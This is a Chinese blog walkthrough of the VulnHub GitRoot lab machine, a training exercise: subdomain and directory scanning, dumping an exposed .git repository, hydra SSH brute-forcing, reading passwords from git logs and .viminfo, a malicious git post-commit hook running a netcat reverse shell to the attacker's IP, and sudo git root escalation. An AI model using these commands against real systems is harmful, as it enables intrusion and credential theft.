vulnhub之GitRoot的实践

一颗小胡椒2023-05-08 11:12:17

今天实践的是vulnhub的GitRoot镜像,

下载地址,https://download.vulnhub.com/gitroot/GitRoot.ova,

用virtualbox导入,直接从console上看到了地址,192.168.0.195,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.195,

有web服务,浏览器访问http://192.168.0.195,

提示了域名,wp.gitroot.vuln,把gitroot.vuln加入/etc/hosts,

进行其它子域名的发现,获取到子域名repo.gitroot.vuln,

gobuster vhost --append-domain -u gitroot.vuln -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200",

把repo.gitroot.vuln加入/etc/hosts,

进行目录扫描,dirb http://repo.gitroot.vuln,

发现http://repo.gitroot.vuln/.git/,

kali攻击机上下载gitdumper,

git clone https://github.com/arthaud/git-dumper.git,

cd git-dumper,mkdir backup,

把信息dump到本地,

./git_dumper.py http://repo.gitroot.vuln/.git/ backup,

查看,cd backup,git log,获取到用户名pablo,

破解密码,hydra -l pablo -P /usr/share/wordlists/rockyou.txt 192.168.0.195 ssh,获取到密码mastergitar,

ssh登录,ssh pablo@192.168.0.195,不是root,发现三个账户,

进入目录,cd /opt/auth/.git/logs/refs/heads,

找到了beth的密码r3vpdmspqdb,

切到beth,su beth,

进入临时可写目录,cd /tmp,

创建目录,mkdir -p .git/hooks,cd .git/hooks,

创建文件,vim post-commit,

nc 192.168.0.197 4444 -e /bin/bash

给权限,chmod 777 post-commit,

回到tmp目录,cd /tmp,压缩文件,7z a shell.zip .git/,

kali攻击机那边用nc开个反弹shell监听,nc -nlvp 4444,

cp shell.zip /home/jen/public/repos/,

kali攻击机拿到反弹shell,

转成交互式,python3 -c "import pty;pty.spawn('/bin/bash')",

进入home目录,cd /home/jen,查看ls -la,

从文件中获取到密码,cat .viminfo,binzpbeocnexoe,

sudo -l查看root权限程序,是git,

GTFOBins搜到提权方法,

提权,sudo git -p help config,!/bin/sh,id确认是root,

rootrepo
本作品采用《CC 协议》,转载必须注明作者和本文链接
网络拓扑场景介绍局域网下含有物理机、proxy server主机。物理机即普通客户主机,proxy server即企业提供的代理,此网络模拟的是公网环境。
创建本地yum仓库
2023-04-24 14:41:49
本文分享自天翼云开发者社区《创建本地yum仓库》,作者: zzzzgj; 背景有的部署环境不通外网,但希望继续使用yum命令下载依赖包而不修改部署脚本逻辑。因此记录一个本地repo的建立方法。CentOS wiki提供了一个如何做到这一点。
据悉,恶意软件BotenaGo已部署了30多种功能,使数百万物联网设备面临潜在网络攻击的风险。 近日,网络安全公司Nozomi Networks Labs发现了专门针对Lilin安全摄像头DVR设备恶意软件BotenaGo的新变种,并将其命名为“Lillin扫描仪”,开发人员在源代码中使用了它的名称:/root/lillin.go。它是迄今为止最隐秘的变种,任何反病毒引擎都无法检测到它的运行。
据悉,恶意软件BotenaGo已部署了30多种功能,使数百万物联网设备面临潜在网络攻击的风险。 近日,网络安全公司Nozomi Networks Labs发现了专门针对Lilin安全摄像头DVR设备恶意软件BotenaGo的新变种,并将其命名为“Lillin扫描仪”,开发人员在源代码中使用了它的名称:/root/lillin.go。它是迄今为止最隐秘的变种,任何反病毒引擎都无法检测到它的运行
iPhone制造商表示,它通过额外的验证来解决这个问题。在2023年1月23日发货的iOS 16.3、iPadOS 16.3和macOS Ventura 13.2中,这些中度至高度的漏洞已经得到修补。Austin Emmitt表示:上述漏洞代表了对macOS和iOS安全模型的重大破坏,该模型依赖于单个应用程序对所需资源的子集进行细粒度访问,并查询更高特权的服务以获取其他任何内容。
GitLab的安装和使用
2022-05-08 07:13:44
近期目标是整明白用GitLab玩儿CI/CD,本周先从安装和使用开始, 安装非常简单,ubuntu20.04, curl -s https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh | sudo bash, sudo apt install gitlab-ce,
PersistenceIsFutile,8个后门。虽然说用脚本跑下就基本全出来了,但我还是想要个矜持的
记一道有趣的VMware PWN
2021-09-10 18:30:20
题目亮点在于无需泄露libc地址,操控程序内部计算即可进行精准覆盖。
vulnhub之GitRoot的实践
2023-05-08 11:12:17
/bin/sh,id确认是root
靶机Agile补充图片
2023-03-22 10:04:15
Nmap done: 1 IP address scanned in 171.68 seconds. 添加host└─# echo "10.10.11.203 superpass.htb" >> /etc/hosts. 注册个账号就读取了。我们可以在 python 中创建一个脚本,自动实现这个过程,只需要输入的文件路径└─# cat lfi.py. data = {"username": "123", "password": "123", "submit": ""}
一颗小胡椒
暂无描述